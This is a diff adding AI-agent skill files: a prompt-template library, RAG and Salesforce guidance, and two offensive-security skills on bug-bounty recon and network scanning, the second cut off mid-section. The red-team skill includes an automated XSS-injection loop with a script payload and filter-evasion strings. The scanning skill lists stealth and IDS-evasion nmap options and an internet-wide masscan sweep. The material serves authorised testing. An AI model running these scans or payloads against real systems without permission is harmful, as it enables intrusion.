> A comprehensive collection of battle-tested prompts inspired by [awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts) and community best practices.
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
Use this skill when the user:
|
||||
|
||||
- Needs ready-to-use prompt templates
|
||||
- Wants role-based prompts (act as X)
|
||||
- Asks for prompt examples or inspiration
|
||||
- Needs task-specific prompt patterns
|
||||
- Wants to improve their prompting
|
||||
|
||||
## Prompt Categories
|
||||
|
||||
### 🎭 Role-Based Prompts
|
||||
|
||||
#### Expert Developer
|
||||
|
||||
```
|
||||
Act as an expert software developer with 15+ years of experience. You specialize in clean code, SOLID principles, and pragmatic architecture. When reviewing code:
|
||||
1. Identify bugs and potential issues
|
||||
2. Suggest performance improvements
|
||||
3. Recommend better patterns
|
||||
4. Explain your reasoning clearly
|
||||
Always prioritize readability and maintainability over cleverness.
|
||||
```
|
||||
|
||||
#### Code Reviewer
|
||||
|
||||
```
|
||||
Act as a senior code reviewer. Your role is to:
|
||||
1. Check for bugs, edge cases, and error handling
|
||||
2. Evaluate code structure and organization
|
||||
3. Assess naming conventions and readability
|
||||
4. Identify potential security issues
|
||||
5. Suggest improvements with specific examples
|
||||
|
||||
Format your review as:
|
||||
🔴 Critical Issues (must fix)
|
||||
🟡 Suggestions (should consider)
|
||||
🟢 Praise (what's done well)
|
||||
```
|
||||
|
||||
#### Technical Writer
|
||||
|
||||
```
|
||||
Act as a technical documentation expert. Transform complex technical concepts into clear, accessible documentation. Follow these principles:
|
||||
- Use simple language, avoid jargon
|
||||
- Include practical examples
|
||||
- Structure with clear headings
|
||||
- Add code snippets where helpful
|
||||
- Consider the reader's experience level
|
||||
```
|
||||
|
||||
#### System Architect
|
||||
|
||||
```
|
||||
Act as a senior system architect designing for scale. Consider:
|
||||
- Scalability (horizontal and vertical)
|
||||
- Reliability (fault tolerance, redundancy)
|
||||
- Maintainability (modularity, clear boundaries)
|
||||
- Performance (latency, throughput)
|
||||
- Cost efficiency
|
||||
|
||||
Provide architecture decisions with trade-off analysis.
|
||||
```
|
||||
|
||||
### 🛠️ Task-Specific Prompts
|
||||
|
||||
#### Debug This Code
|
||||
|
||||
```
|
||||
Debug the following code. Your analysis should include:
|
||||
|
||||
1. **Problem Identification**: What exactly is failing?
|
||||
2. **Root Cause**: Why is it failing?
|
||||
3. **Fix**: Provide corrected code
|
||||
4. **Prevention**: How to prevent similar bugs
|
||||
|
||||
Show your debugging thought process step by step.
|
||||
```
|
||||
|
||||
#### Explain Like I'm 5 (ELI5)
|
||||
|
||||
```
|
||||
Explain [CONCEPT] as if I'm 5 years old. Use:
|
||||
- Simple everyday analogies
|
||||
- No technical jargon
|
||||
- Short sentences
|
||||
- Relatable examples from daily life
|
||||
- A fun, engaging tone
|
||||
```
|
||||
|
||||
#### Code Refactoring
|
||||
|
||||
```
|
||||
Refactor this code following these priorities:
|
||||
1. Readability first
|
||||
2. Remove duplication (DRY)
|
||||
3. Single responsibility per function
|
||||
4. Meaningful names
|
||||
5. Add comments only where necessary
|
||||
|
||||
Show before/after with explanation of changes.
|
||||
```
|
||||
|
||||
#### Write Tests
|
||||
|
||||
```
|
||||
Write comprehensive tests for this code:
|
||||
1. Happy path scenarios
|
||||
2. Edge cases
|
||||
3. Error conditions
|
||||
4. Boundary values
|
||||
|
||||
Use [FRAMEWORK] testing conventions. Include:
|
||||
- Descriptive test names
|
||||
- Arrange-Act-Assert pattern
|
||||
- Mocking where appropriate
|
||||
```
|
||||
|
||||
#### API Documentation
|
||||
|
||||
```
|
||||
Generate API documentation for this endpoint including:
|
||||
- Endpoint URL and method
|
||||
- Request parameters (path, query, body)
|
||||
- Request/response examples
|
||||
- Error codes and meanings
|
||||
- Authentication requirements
|
||||
- Rate limits if applicable
|
||||
|
||||
Format as OpenAPI/Swagger or Markdown.
|
||||
```
|
||||
|
||||
### 📊 Analysis Prompts
|
||||
|
||||
#### Code Complexity Analysis
|
||||
|
||||
```
|
||||
Analyze the complexity of this codebase:
|
||||
|
||||
1. **Cyclomatic Complexity**: Identify complex functions
|
||||
2. **Coupling**: Find tightly coupled components
|
||||
3. **Cohesion**: Assess module cohesion
|
||||
4. **Dependencies**: Map critical dependencies
|
||||
5. **Technical Debt**: Highlight areas needing refactoring
|
||||
|
||||
Rate each area and provide actionable recommendations.
|
||||
```
|
||||
|
||||
#### Performance Analysis
|
||||
|
||||
```
|
||||
Analyze this code for performance issues:
|
||||
|
||||
1. **Time Complexity**: Big O analysis
|
||||
2. **Space Complexity**: Memory usage patterns
|
||||
3. **I/O Bottlenecks**: Database, network, disk
|
||||
4. **Algorithmic Issues**: Inefficient patterns
|
||||
5. **Quick Wins**: Easy optimizations
|
||||
|
||||
Prioritize findings by impact.
|
||||
```
|
||||
|
||||
#### Security Review
|
||||
|
||||
```
|
||||
Perform a security review of this code:
|
||||
|
||||
1. **Input Validation**: Check all inputs
|
||||
2. **Authentication/Authorization**: Access control
|
||||
3. **Data Protection**: Sensitive data handling
|
||||
4. **Injection Vulnerabilities**: SQL, XSS, etc.
|
||||
5. **Dependencies**: Known vulnerabilities
|
||||
|
||||
Classify issues by severity (Critical/High/Medium/Low).
|
||||
```
|
||||
|
||||
### 🎨 Creative Prompts
|
||||
|
||||
#### Brainstorm Features
|
||||
|
||||
```
|
||||
Brainstorm features for [PRODUCT]:
|
||||
|
||||
For each feature, provide:
|
||||
- Name and one-line description
|
||||
- User value proposition
|
||||
- Implementation complexity (Low/Med/High)
|
||||
- Dependencies on other features
|
||||
|
||||
Generate 10 ideas, then rank top 3 by impact/effort ratio.
|
||||
```
|
||||
|
||||
#### Name Generator
|
||||
|
||||
```
|
||||
Generate names for [PROJECT/FEATURE]:
|
||||
|
||||
Provide 10 options in these categories:
|
||||
- Descriptive (what it does)
|
||||
- Evocative (how it feels)
|
||||
- Acronyms (memorable abbreviations)
|
||||
- Metaphorical (analogies)
|
||||
|
||||
For each, explain the reasoning and check domain availability patterns.
|
||||
```
|
||||
|
||||
### 🔄 Transformation Prompts
|
||||
|
||||
#### Migrate Code
|
||||
|
||||
```
|
||||
Migrate this code from [SOURCE] to [TARGET]:
|
||||
|
||||
1. Identify equivalent constructs
|
||||
2. Handle incompatible features
|
||||
3. Preserve functionality exactly
|
||||
4. Follow target language idioms
|
||||
5. Add necessary dependencies
|
||||
|
||||
Show the migration step by step with explanations.
|
||||
```
|
||||
|
||||
#### Convert Format
|
||||
|
||||
```
|
||||
Convert this [SOURCE_FORMAT] to [TARGET_FORMAT]:
|
||||
|
||||
Requirements:
|
||||
- Preserve all data
|
||||
- Use idiomatic target format
|
||||
- Handle edge cases
|
||||
- Validate the output
|
||||
- Provide sample verification
|
||||
```
|
||||
|
||||
## Prompt Engineering Techniques
|
||||
|
||||
### Chain of Thought (CoT)
|
||||
|
||||
```
|
||||
Let's solve this step by step:
|
||||
1. First, I'll understand the problem
|
||||
2. Then, I'll identify the key components
|
||||
3. Next, I'll work through the logic
|
||||
4. Finally, I'll verify the solution
|
||||
|
||||
[Your question here]
|
||||
```
|
||||
|
||||
### Few-Shot Learning
|
||||
|
||||
```
|
||||
Here are some examples of the task:
|
||||
|
||||
Example 1:
|
||||
Input: [example input 1]
|
||||
Output: [example output 1]
|
||||
|
||||
Example 2:
|
||||
Input: [example input 2]
|
||||
Output: [example output 2]
|
||||
|
||||
Now complete this:
|
||||
Input: [actual input]
|
||||
Output:
|
||||
```
|
||||
|
||||
### Persona Pattern
|
||||
|
||||
```
|
||||
You are [PERSONA] with [TRAITS].
|
||||
Your communication style is [STYLE].
|
||||
You prioritize [VALUES].
|
||||
|
||||
When responding:
|
||||
- [Behavior 1]
|
||||
- [Behavior 2]
|
||||
- [Behavior 3]
|
||||
```
|
||||
|
||||
### Structured Output
|
||||
|
||||
```
|
||||
Respond in the following JSON format:
|
||||
{
|
||||
"analysis": "your analysis here",
|
||||
"recommendations": ["rec1", "rec2"],
|
||||
"confidence": 0.0-1.0,
|
||||
"caveats": ["caveat1"]
|
||||
}
|
||||
```
|
||||
|
||||
## Prompt Improvement Checklist
|
||||
|
||||
When crafting prompts, ensure:
|
||||
|
||||
- [ ] **Clear objective**: What exactly do you want?
|
||||
- [ ] **Context provided**: Background information included?
|
||||
- [ ] **Format specified**: How should output be structured?
|
||||
- [ ] **Examples given**: Are there reference examples?
|
||||
- [ ] **Constraints defined**: Any limitations or requirements?
|
||||
- [ ] **Success criteria**: How do you measure good output?
|
||||
|
||||
## Resources
|
||||
|
||||
- [awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts)
|
||||
- [prompts.chat](https://prompts.chat)
|
||||
- [Learn Prompting](https://learnprompting.org/)
|
||||
|
||||
---
|
||||
|
||||
> 💡 **Tip**: The best prompts are specific, provide context, and include examples of desired output.
|
||||
90
skills/rag-engineer/SKILL.md
Normal file
90
skills/rag-engineer/SKILL.md
Normal file
@@ -0,0 +1,90 @@
|
||||
---
|
||||
name: rag-engineer
|
||||
description: "Expert in building Retrieval-Augmented Generation systems. Masters embedding models, vector databases, chunking strategies, and retrieval optimization for LLM applications. Use when: building RAG, vector search, embeddings, semantic search, document retrieval."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# RAG Engineer
|
||||
|
||||
**Role**: RAG Systems Architect
|
||||
|
||||
I bridge the gap between raw documents and LLM understanding. I know that
|
||||
retrieval quality determines generation quality - garbage in, garbage out.
|
||||
I obsess over chunking boundaries, embedding dimensions, and similarity
|
||||
metrics because they make the difference between helpful and hallucinating.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Vector embeddings and similarity search
|
||||
- Document chunking and preprocessing
|
||||
- Retrieval pipeline design
|
||||
- Semantic search implementation
|
||||
- Context window optimization
|
||||
- Hybrid search (keyword + semantic)
|
||||
|
||||
## Requirements
|
||||
|
||||
- LLM fundamentals
|
||||
- Understanding of embeddings
|
||||
- Basic NLP concepts
|
||||
|
||||
## Patterns
|
||||
|
||||
### Semantic Chunking
|
||||
|
||||
Chunk by meaning, not arbitrary token counts
|
||||
|
||||
```javascript
|
||||
- Use sentence boundaries, not token limits
|
||||
- Detect topic shifts with embedding similarity
|
||||
- Preserve document structure (headers, paragraphs)
|
||||
- Include overlap for context continuity
|
||||
- Add metadata for filtering
|
||||
```
|
||||
|
||||
### Hierarchical Retrieval
|
||||
|
||||
Multi-level retrieval for better precision
|
||||
|
||||
```javascript
|
||||
- Index at multiple chunk sizes (paragraph, section, document)
|
||||
- First pass: coarse retrieval for candidates
|
||||
- Second pass: fine-grained retrieval for precision
|
||||
- Use parent-child relationships for context
|
||||
```
|
||||
|
||||
### Hybrid Search
|
||||
|
||||
Combine semantic and keyword search
|
||||
|
||||
```javascript
|
||||
- BM25/TF-IDF for keyword matching
|
||||
- Vector similarity for semantic matching
|
||||
- Reciprocal Rank Fusion for combining scores
|
||||
- Weight tuning based on query type
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Fixed Chunk Size
|
||||
|
||||
### ❌ Embedding Everything
|
||||
|
||||
### ❌ Ignoring Evaluation
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Fixed-size chunking breaks sentences and context | high | Use semantic chunking that respects document structure: |
|
||||
| Pure semantic search without metadata pre-filtering | medium | Implement hybrid filtering: |
|
||||
| Using same embedding model for different content types | medium | Evaluate embeddings per content type: |
|
||||
| Using first-stage retrieval results directly | medium | Add reranking step: |
|
||||
| Cramming maximum context into LLM prompt | medium | Use relevance thresholds: |
|
||||
| Not measuring retrieval quality separately from generation | high | Separate retrieval evaluation: |
|
||||
| Not updating embeddings when source documents change | medium | Implement embedding refresh: |
|
||||
| Same retrieval strategy for all query types | medium | Implement hybrid search: |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `ai-agents-architect`, `prompt-engineer`, `database-architect`, `backend`
|
||||
63
skills/rag-implementation/SKILL.md
Normal file
63
skills/rag-implementation/SKILL.md
Normal file
@@ -0,0 +1,63 @@
|
||||
---
|
||||
name: rag-implementation
|
||||
description: "Retrieval-Augmented Generation patterns including chunking, embeddings, vector stores, and retrieval optimization Use when: rag, retrieval augmented, vector search, embeddings, semantic search."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# RAG Implementation
|
||||
|
||||
You're a RAG specialist who has built systems serving millions of queries over
|
||||
terabytes of documents. You've seen the naive "chunk and embed" approach fail,
|
||||
and developed sophisticated chunking, retrieval, and reranking strategies.
|
||||
|
||||
You understand that RAG is not just vector search—it's about getting the right
|
||||
information to the LLM at the right time. You know when RAG helps and when
|
||||
it's unnecessary overhead.
|
||||
|
||||
Your core principles:
|
||||
1. Chunking is critical—bad chunks mean bad retrieval
|
||||
2. Hybri
|
||||
|
||||
## Capabilities
|
||||
|
||||
- document-chunking
|
||||
- embedding-models
|
||||
- vector-stores
|
||||
- retrieval-strategies
|
||||
- hybrid-search
|
||||
- reranking
|
||||
|
||||
## Patterns
|
||||
|
||||
### Semantic Chunking
|
||||
|
||||
Chunk by meaning, not arbitrary size
|
||||
|
||||
### Hybrid Search
|
||||
|
||||
Combine dense (vector) and sparse (keyword) search
|
||||
|
||||
### Contextual Reranking
|
||||
|
||||
Rerank retrieved docs with LLM for relevance
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Fixed-Size Chunking
|
||||
|
||||
### ❌ No Overlap
|
||||
|
||||
### ❌ Single Retrieval Strategy
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Poor chunking ruins retrieval quality | critical | // Use recursive character text splitter with overlap |
|
||||
| Query and document embeddings from different models | critical | // Ensure consistent embedding model usage |
|
||||
| RAG adds significant latency to responses | high | // Optimize RAG latency |
|
||||
| Documents updated but embeddings not refreshed | medium | // Maintain sync between documents and embeddings |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `context-window-management`, `conversation-memory`, `prompt-caching`, `data-pipeline`
|
||||
307
skills/red-team-tools/SKILL.md
Normal file
307
skills/red-team-tools/SKILL.md
Normal file
@@ -0,0 +1,307 @@
|
||||
---
|
||||
name: Red Team Tools and Methodology
|
||||
description: This skill should be used when the user asks to "follow red team methodology", "perform bug bounty hunting", "automate reconnaissance", "hunt for XSS vulnerabilities", "enumerate subdomains", or needs security researcher techniques and tool configurations from top bug bounty hunters.
|
||||
---
|
||||
|
||||
# Red Team Tools and Methodology
|
||||
|
||||
## Purpose
|
||||
|
||||
Implement proven methodologies and tool workflows from top security researchers for effective reconnaissance, vulnerability discovery, and bug bounty hunting. Automate common tasks while maintaining thorough coverage of attack surfaces.
|
||||
|
||||
## Inputs/Prerequisites
|
||||
|
||||
- Target scope definition (domains, IP ranges, applications)
|
||||
- Linux-based attack machine (Kali, Ubuntu)
|
||||
- Bug bounty program rules and scope
|
||||
- Tool dependencies installed (Go, Python, Ruby)
|
||||
- API keys for various services (Shodan, Censys, etc.)
|
||||
|
||||
## Outputs/Deliverables
|
||||
|
||||
- Comprehensive subdomain enumeration
|
||||
- Live host discovery and technology fingerprinting
|
||||
- Identified vulnerabilities and attack vectors
|
||||
- Automated recon pipeline outputs
|
||||
- Documented findings for reporting
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### 1. Project Tracking and Acquisitions
|
||||
|
||||
Set up reconnaissance tracking:
|
||||
|
||||
```bash
|
||||
# Create project structure
|
||||
mkdir -p target/{recon,vulns,reports}
|
||||
cd target
|
||||
|
||||
# Find acquisitions using Crunchbase
|
||||
# Search manually for subsidiary companies
|
||||
|
||||
# Get ASN for targets
|
||||
amass intel -org "Target Company" -src
|
||||
|
||||
# Alternative ASN lookup
|
||||
curl -s "https://bgp.he.net/search?search=targetcompany&commit=Search"
|
||||
```
|
||||
|
||||
### 2. Subdomain Enumeration
|
||||
|
||||
Comprehensive subdomain discovery:
|
||||
|
||||
```bash
|
||||
# Create wildcards file
|
||||
echo "target.com" > wildcards
|
||||
|
||||
# Run Amass passively
|
||||
amass enum -passive -d target.com -src -o amass_passive.txt
|
||||
|
||||
# Run Amass actively
|
||||
amass enum -active -d target.com -src -o amass_active.txt
|
||||
|
||||
# Use Subfinder
|
||||
subfinder -d target.com -silent -o subfinder.txt
|
||||
|
||||
# Asset discovery
|
||||
cat wildcards | assetfinder --subs-only | anew domains.txt
|
||||
|
||||
# Alternative subdomain tools
|
||||
findomain -t target.com -o
|
||||
|
||||
# Generate permutations with dnsgen
|
||||
cat domains.txt | dnsgen - | httprobe > permuted.txt
|
||||
|
||||
# Combine all sources
|
||||
cat amass_*.txt subfinder.txt | sort -u > all_subs.txt
|
||||
```
|
||||
|
||||
### 3. Live Host Discovery
|
||||
|
||||
Identify responding hosts:
|
||||
|
||||
```bash
|
||||
# Check which hosts are live with httprobe
|
||||
cat domains.txt | httprobe -c 80 --prefer-https | anew hosts.txt
|
||||
|
||||
# Use httpx for more details
|
||||
cat domains.txt | httpx -title -tech-detect -status-code -o live_hosts.txt
|
||||
|
||||
# Alternative with massdns
|
||||
massdns -r resolvers.txt -t A -o S domains.txt > resolved.txt
|
||||
```
|
||||
|
||||
### 4. Technology Fingerprinting
|
||||
|
||||
Identify technologies for targeted attacks:
|
||||
|
||||
```bash
|
||||
# Whatweb scanning
|
||||
whatweb -i hosts.txt -a 3 -v > tech_stack.txt
|
||||
|
||||
# Nuclei technology detection
|
||||
nuclei -l hosts.txt -t technologies/ -o tech_nuclei.txt
|
||||
|
||||
# Wappalyzer (if available)
|
||||
# Browser extension for manual review
|
||||
```
|
||||
|
||||
### 5. Content Discovery
|
||||
|
||||
Find hidden endpoints and files:
|
||||
|
||||
```bash
|
||||
# Directory bruteforce with ffuf
|
||||
ffuf -ac -v -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
|
||||
|
||||
# Historical URLs from Wayback
|
||||
waybackurls target.com | tee wayback.txt
|
||||
|
||||
# Find all URLs with gau
|
||||
gau target.com | tee all_urls.txt
|
||||
|
||||
# Parameter discovery
|
||||
cat all_urls.txt | grep "=" | sort -u > params.txt
|
||||
|
||||
# Generate custom wordlist from historical data
|
||||
cat all_urls.txt | unfurl paths | sort -u > custom_wordlist.txt
|
||||
```
|
||||
|
||||
### 6. Application Analysis (Jason Haddix Method)
|
||||
|
||||
**Heat Map Priority Areas:**
|
||||
|
||||
1. **File Uploads** - Test for injection, XXE, SSRF, shell upload
|
||||
2. **Content Types** - Filter Burp for multipart forms
|
||||
3. **APIs** - Look for hidden methods, lack of auth
|
||||
4. **Profile Sections** - Stored XSS, custom fields
|
||||
5. **Integrations** - SSRF through third parties
|
||||
6. **Error Pages** - Exotic injection points
|
||||
|
||||
**Analysis Questions:**
|
||||
- How does the app pass data? (Params, API, Hybrid)
|
||||
- Where does the app talk about users? (UID, UUID endpoints)
|
||||
- Does the site have multi-tenancy or user levels?
|
||||
- Does it have a unique threat model?
|
||||
- How does the site handle XSS/CSRF?
|
||||
- Has the site had past writeups/exploits?
|
||||
|
||||
### 7. Automated XSS Hunting
|
||||
|
||||
```bash
|
||||
# ParamSpider for parameter extraction
|
||||
python3 paramspider.py --domain target.com -o params.txt
|
||||
|
||||
# Filter with Gxss
|
||||
cat params.txt | Gxss -p test
|
||||
|
||||
# Dalfox for XSS testing
|
||||
cat params.txt | dalfox pipe --mining-dict params.txt -o xss_results.txt
|
||||
|
||||
# Alternative workflow
|
||||
waybackurls target.com | grep "=" | qsreplace '"><script>alert(1)</script>' | while read url; do
|
||||
curl -s "$url" | grep -q 'alert(1)' && echo "$url"
|
||||
done > potential_xss.txt
|
||||
```
|
||||
|
||||
### 8. Vulnerability Scanning
|
||||
|
||||
```bash
|
||||
# Nuclei comprehensive scan
|
||||
nuclei -l hosts.txt -t ~/nuclei-templates/ -o nuclei_results.txt
|
||||
|
||||
# Check for common CVEs
|
||||
nuclei -l hosts.txt -t cves/ -o cve_results.txt
|
||||
|
||||
# Web vulnerabilities
|
||||
nuclei -l hosts.txt -t vulnerabilities/ -o vuln_results.txt
|
||||
```
|
||||
|
||||
### 9. API Enumeration
|
||||
|
||||
**Wordlists for API fuzzing:**
|
||||
|
||||
```bash
|
||||
# Enumerate API endpoints
|
||||
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
|
||||
|
||||
# Test API versions
|
||||
ffuf -u https://target.com/api/v1/FUZZ -w api_wordlist.txt
|
||||
ffuf -u https://target.com/api/v2/FUZZ -w api_wordlist.txt
|
||||
|
||||
# Check for hidden methods
|
||||
for method in GET POST PUT DELETE PATCH; do
|
||||
curl -X $method https://target.com/api/users -v
|
||||
done
|
||||
```
|
||||
|
||||
### 10. Automated Recon Script
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
domain=$1
|
||||
|
||||
if [[ -z $domain ]]; then
|
||||
echo "Usage: ./recon.sh <domain>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
mkdir -p "$domain"
|
||||
|
||||
# Subdomain enumeration
|
||||
echo "[*] Enumerating subdomains..."
|
||||
subfinder -d "$domain" -silent > "$domain/subs.txt"
|
||||
|
||||
# Live host discovery
|
||||
echo "[*] Finding live hosts..."
|
||||
cat "$domain/subs.txt" | httpx -title -tech-detect -status-code > "$domain/live.txt"
|
||||
|
||||
# URL collection
|
||||
echo "[*] Collecting URLs..."
|
||||
cat "$domain/live.txt" | waybackurls > "$domain/urls.txt"
|
||||
|
||||
# Nuclei scanning
|
||||
echo "[*] Running Nuclei..."
|
||||
nuclei -l "$domain/live.txt" -o "$domain/nuclei.txt"
|
||||
|
||||
echo "[+] Recon complete!"
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Essential Tools
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| Amass | Subdomain enumeration |
|
||||
| Subfinder | Fast subdomain discovery |
|
||||
| httpx/httprobe | Live host detection |
|
||||
| ffuf | Content discovery |
|
||||
| Nuclei | Vulnerability scanning |
|
||||
| Burp Suite | Manual testing |
|
||||
| Dalfox | XSS automation |
|
||||
| waybackurls | Historical URL mining |
|
||||
|
||||
### Key API Endpoints to Check
|
||||
|
||||
```
|
||||
/api/v1/users
|
||||
/api/v1/admin
|
||||
/api/v1/profile
|
||||
/api/users/me
|
||||
/api/config
|
||||
/api/debug
|
||||
/api/swagger
|
||||
/api/graphql
|
||||
```
|
||||
|
||||
### XSS Filter Testing
|
||||
|
||||
```html
|
||||
<!-- Test encoding handling -->
|
||||
<h1><img><table>
|
||||
<script>
|
||||
%3Cscript%3E
|
||||
%253Cscript%253E
|
||||
%26lt;script%26gt;
|
||||
```
|
||||
|
||||
## Constraints
|
||||
|
||||
- Respect program scope boundaries
|
||||
- Avoid DoS or fuzzing on production without permission
|
||||
- Rate limit requests to avoid blocking
|
||||
- Some tools may generate false positives
|
||||
- API keys required for full functionality of some tools
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Quick Subdomain Recon
|
||||
|
||||
```bash
|
||||
subfinder -d target.com | httpx -title | tee results.txt
|
||||
```
|
||||
|
||||
### Example 2: XSS Hunting Pipeline
|
||||
|
||||
```bash
|
||||
waybackurls target.com | grep "=" | qsreplace "test" | httpx -silent | dalfox pipe
|
||||
```
|
||||
|
||||
### Example 3: Comprehensive Scan
|
||||
|
||||
```bash
|
||||
# Full recon chain
|
||||
amass enum -d target.com | httpx | nuclei -t ~/nuclei-templates/
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solution |
|
||||
|-------|----------|
|
||||
| Rate limited | Use proxy rotation, reduce concurrency |
|
||||
| Too many results | Focus on specific technology stacks |
|
||||
| False positives | Manually verify findings before reporting |
|
||||
| Missing subdomains | Combine multiple enumeration sources |
|
||||
| API key errors | Verify keys in config files |
|
||||
| Tools not found | Install Go tools with `go install` |
|
||||
51
skills/salesforce-development/SKILL.md
Normal file
51
skills/salesforce-development/SKILL.md
Normal file
@@ -0,0 +1,51 @@
|
||||
---
|
||||
name: salesforce-development
|
||||
description: "Expert patterns for Salesforce platform development including Lightning Web Components (LWC), Apex triggers and classes, REST/Bulk APIs, Connected Apps, and Salesforce DX with scratch orgs and 2nd generation packages (2GP). Use when: salesforce, sfdc, apex, lwc, lightning web components."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Salesforce Development
|
||||
|
||||
## Patterns
|
||||
|
||||
### Lightning Web Component with Wire Service
|
||||
|
||||
Use @wire decorator for reactive data binding with Lightning Data Service
|
||||
or Apex methods. @wire fits LWC's reactive architecture and enables
|
||||
Salesforce performance optimizations.
|
||||
|
||||
|
||||
### Bulkified Apex Trigger with Handler Pattern
|
||||
|
||||
Apex triggers must be bulkified to handle 200+ records per transaction.
|
||||
Use handler pattern for separation of concerns, testability, and
|
||||
recursion prevention.
|
||||
|
||||
|
||||
### Queueable Apex for Async Processing
|
||||
|
||||
Use Queueable Apex for async processing with support for non-primitive
|
||||
types, monitoring via AsyncApexJob, and job chaining. Limit: 50 jobs
|
||||
per transaction, 1 child job when chaining.
|
||||
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ SOQL Inside Loops
|
||||
|
||||
### ❌ DML Inside Loops
|
||||
|
||||
### ❌ Hardcoding IDs
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | critical | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | critical | See docs |
|
||||
586
skills/scanning-tools/SKILL.md
Normal file
586
skills/scanning-tools/SKILL.md
Normal file
@@ -0,0 +1,586 @@
|
||||
---
|
||||
name: Security Scanning Tools
|
||||
description: This skill should be used when the user asks to "perform vulnerability scanning", "scan networks for open ports", "assess web application security", "scan wireless networks", "detect malware", "check cloud security", or "evaluate system compliance". It provides comprehensive guidance on security scanning tools and methodologies.
|
||||
---
|
||||
|
||||
# Security Scanning Tools
|
||||
|
||||
## Purpose
|
||||
|
||||
Master essential security scanning tools for network discovery, vulnerability assessment, web application testing, wireless security, and compliance validation. This skill covers tool selection, configuration, and practical usage across different scanning categories.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
### Required Environment
|
||||
- Linux-based system (Kali Linux recommended)
|
||||
- Network access to target systems
|
||||
- Proper authorization for scanning activities
|
||||
|
||||
### Required Knowledge
|
||||
- Basic networking concepts (TCP/IP, ports, protocols)
|
||||
- Understanding of common vulnerabilities
|
||||
- Familiarity with command-line interfaces
|
||||
|
||||
## Outputs and Deliverables
|
||||
|
||||
1. **Network Discovery Reports** - Identified hosts, ports, and services
|
||||
2. **Vulnerability Assessment Reports** - CVEs, misconfigurations, risk ratings
|
||||
3. **Web Application Security Reports** - OWASP Top 10 findings
|
||||
4. **Compliance Reports** - CIS benchmarks, PCI-DSS, HIPAA checks
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: Network Scanning Tools
|
||||
|
||||
#### Nmap (Network Mapper)
|
||||
|
||||
Primary tool for network discovery and security auditing:
|
||||
|
||||
```bash
|
||||
# Host discovery
|
||||
nmap -sn 192.168.1.0/24 # Ping scan (no port scan)
|
||||
nmap -sL 192.168.1.0/24 # List scan (DNS resolution)
|
||||
nmap -Pn 192.168.1.100 # Skip host discovery
|
||||
|
||||
# Port scanning techniques
|
||||
nmap -sS 192.168.1.100 # TCP SYN scan (stealth)
|
||||
nmap -sT 192.168.1.100 # TCP connect scan
|
||||
nmap -sU 192.168.1.100 # UDP scan
|
||||
nmap -sA 192.168.1.100 # ACK scan (firewall detection)
|
||||
|
||||
# Port specification
|
||||
nmap -p 80,443 192.168.1.100 # Specific ports
|
||||
nmap -p- 192.168.1.100 # All 65535 ports
|
||||
nmap -p 1-1000 192.168.1.100 # Port range
|
||||
nmap --top-ports 100 192.168.1.100 # Top 100 common ports
|
||||
|
||||
# Service and OS detection
|
||||
nmap -sV 192.168.1.100 # Service version detection
|
||||
nmap -O 192.168.1.100 # OS detection
|
||||
nmap -A 192.168.1.100 # Aggressive (OS, version, scripts)
|
||||
|
||||
# Timing and performance
|
||||
nmap -T0 192.168.1.100 # Paranoid (slowest, IDS evasion)
|
||||
nmap -T4 192.168.1.100 # Aggressive (faster)
|
||||
nmap -T5 192.168.1.100 # Insane (fastest)
|
||||
|
||||
# NSE Scripts
|
||||
nmap --script=vuln 192.168.1.100 # Vulnerability scripts
|
||||
nmap --script=http-enum 192.168.1.100 # Web enumeration
|
||||
nmap --script=smb-vuln* 192.168.1.100 # SMB vulnerabilities
|
||||
nmap --script=default 192.168.1.100 # Default script set
|
||||
|
||||
# Output formats
|
||||
nmap -oN scan.txt 192.168.1.100 # Normal output
|
||||
nmap -oX scan.xml 192.168.1.100 # XML output
|
||||
nmap -oG scan.gnmap 192.168.1.100 # Grepable output
|
||||
nmap -oA scan 192.168.1.100 # All formats
|
||||
```
|
||||
|
||||
#### Masscan
|
||||
|
||||
High-speed port scanning for large networks:
|
||||
|
||||
```bash
|
||||
# Basic scanning
|
||||
masscan -p80 192.168.1.0/24 --rate=1000
|
||||
masscan -p80,443,8080 192.168.1.0/24 --rate=10000
|
||||
|
||||
# Full port range
|
||||
masscan -p0-65535 192.168.1.0/24 --rate=5000
|
||||
|
||||
# Large-scale scanning
|
||||
masscan 0.0.0.0/0 -p443 --rate=100000 --excludefile exclude.txt
|
||||
|
||||
# Output formats
|
||||
